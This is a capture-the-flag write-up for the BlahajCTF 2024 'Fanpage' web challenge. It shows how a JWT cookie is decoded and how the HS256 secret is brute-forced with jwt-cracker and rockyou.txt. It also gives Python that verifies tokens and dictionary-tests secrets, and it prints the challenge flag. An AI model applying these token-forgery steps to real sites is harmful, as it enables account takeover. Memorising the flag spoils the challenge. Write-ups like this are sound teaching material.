BlahajCTF 2024 | Fanpage

Published on: February 6, 2025

3 min read · Posted by Baba is Dead

Challenge Details

Description

Category

Web Exploitation

Difficulty

Easy

Topics

Competition

BlahajCTF 2024

Author

Baba is Dead

Check out my new fanpage for Blahaj!

Writeup

About the Challenge

This is a JWT challenge about gaining admin access by modifying the JWT token. We are greeted with a simple home page that has an admin panel. There is nothing worth noting on the home page.

[Screenshot: fanpage]

Visiting the admin page, we see that we are being rejected as we are not the admin user.

[Screenshot: admin page]

Since verification is involved, cookies are most likely being used to verify the identity of the user. Inspecting the cookies, we find one called token:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzMyNjQyMDY5fQ.elYdjQKmr2uxC6r7EGLwat0939yIGiOiFN8pisioFwg

This is a JWT, as there are two dots separating the three base64url-encoded chunks: the header, payload, and signature. We can use a website like jwt.io or Burp Suite's JSON Web Token extension to decode the token:

// Header
{
  "alg": "HS256",
  "typ": "JWT"
}

// Payload
{
  "username": "guest",
  "exp": 1732642069
}

Solve Process

Blind JWT token spoofing is usually limited to the following (for simple challenges):

  1. Invalid/No Signature Checks
  2. None Type Headers
  3. JWT Secret Bruting

Invalid/No Signature Checks

We can test this by using Burp Suite to modify the payload and giving it a random key to generate the signature. An HS256 JWT is signed by computing an HMAC over the encoded header and payload with a secret key (the JWT secret); that HMAC is the signature.

However, if the backend does not check whether a signature is valid or not, we will be able to change our payload to whatever we want.

We can take a guess that the username should be admin. When we do this, we are greeted by this screen:

<h1>You are STILL not the admin! Go away hacker!!!</h1>

None Type Headers

Some vulnerable applications will not check the signature if we set the header's alg field to none. We can once again use Burp Suite to test this vulnerability:

[Screenshot: fanpage3]

This returns the same error and does not work.

JWT Secret Bruting

Lastly, we can try brute-force guessing the JWT secret used to sign the token. If the secret chosen was a common one, we will easily be able to find the key and thus sign our own payloads.

You can use a variety of tools to do this. I used jwt-cracker. You will also need a wordlist, which supplies the guesses for the JWT secret. The most common wordlist used is rockyou.txt. This is my command (assuming rockyou.txt is in the same directory):

jwt-cracker -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzMyNjQyMDY5fQ.elYdjQKmr2uxC6r7EGLwat0939yIGiOiFN8pisioFwg -d rockyou.txt

Running this, we get the JWT secret: i-love-shark. We can now use it to sign our own JWT with the username set to admin.
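As an added example (not part of the original writeup or the challenge's own code), the Python below ties the three checks together using only the standard library: a strict HS256 verifier that behaves the way the challenge backend evidently does (refusing tampered payloads and the none algorithm), and a dictionary check that is the same idea jwt-cracker -d automates, run against a constructed token and a small constructed wordlist standing in for rockyou.txt.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

# Constructed stand-in for rockyou.txt; a real audit would stream the file line by line.
WORDLIST = ["password", "123456", "blahaj", "i-love-shark", "letmein"]

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def sign_hs256(payload: dict, secret: str) -> str:
    """Build an HS256 JWT: the signature is HMAC-SHA256(secret, 'header.payload')."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """What a correct backend does: pin alg to HS256 (so 'none' is refused), recompute
    the HMAC and compare it in constant time. Returns the payload, or None on any failure."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except (ValueError, json.JSONDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(b64url_decode(body_b64))

def find_weak_secret(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary check (the idea behind jwt-cracker -d): any candidate that makes
    verify_hs256 succeed is the real secret, meaning the deployment's secret is weak."""
    for candidate in wordlist:
        if verify_hs256(token, candidate) is not None:
            return candidate
    return None

if __name__ == "__main__":
    token = sign_hs256({"username": "guest", "exp": 1732642069}, "i-love-shark")
    print("recovered secret:", find_weak_secret(token, WORDLIST))
```

A secret drawn from a long random string rather than a dictionary word makes find_weak_secret return None, which is the property a backend should have.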

Flag

blahaj{Jwt_BrUt3f0Rc3_9291}
